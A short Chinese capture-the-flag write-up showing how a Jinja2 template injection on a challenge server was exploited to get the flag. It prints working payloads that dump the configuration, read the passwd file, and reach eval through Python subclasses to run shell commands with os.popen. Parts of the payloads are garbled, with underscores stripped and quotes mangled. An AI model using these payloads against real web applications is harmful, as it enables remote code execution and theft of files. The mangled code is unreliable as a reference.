(1)简单探测
http://111.198.29.45:42611/{{7+7}}
返回 URL http://111.198.29.45:47259/14 not found
证明执行了这个命令,
(2)http://111.198.29.45:47259/{{config.items()}} 查看系统配置;
(3)读取passwd信息 {{ [].class.base.subclasses()40.read() }};
(4)执行下面代码:
{% for c in [].class.base.subclasses() %}
{% if c.name == ‘catch_warnings’ %}
{% for b in c.init.globals.values() %}
{% if b.class == {}.class %} //遍历基类 找到eval函数
{% if ‘eval’ in b.keys() %} //找到了
{{ b’eval’ }} //导入cmd 执行popen里的命令 read读出数据
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
列出文件
URL http://111.198.29.45:47259/ //遍历基类 找到eval函数 //遍历基类 找到eval函数 //遍历基类 找到eval函数 //找到了fl4g index.py //导入cmd 执行popen里的命令 read读出数据 not found
(5)修改一下命令
ls 改成cat fl4g,就可以读取flag了
{% for c in [].class.base.subclasses() %}
{% if c.name == ‘catch_warnings’ %}
{% for b in c.init.globals.values() %}
{% if b.class == {}.class %} //遍历基类 找到eval函数
{% if 'eval' in b.keys() %} //找到了
{{ b['eval']('__import__("os").popen("cat fl4g").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
Get flag成功
Flag: ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}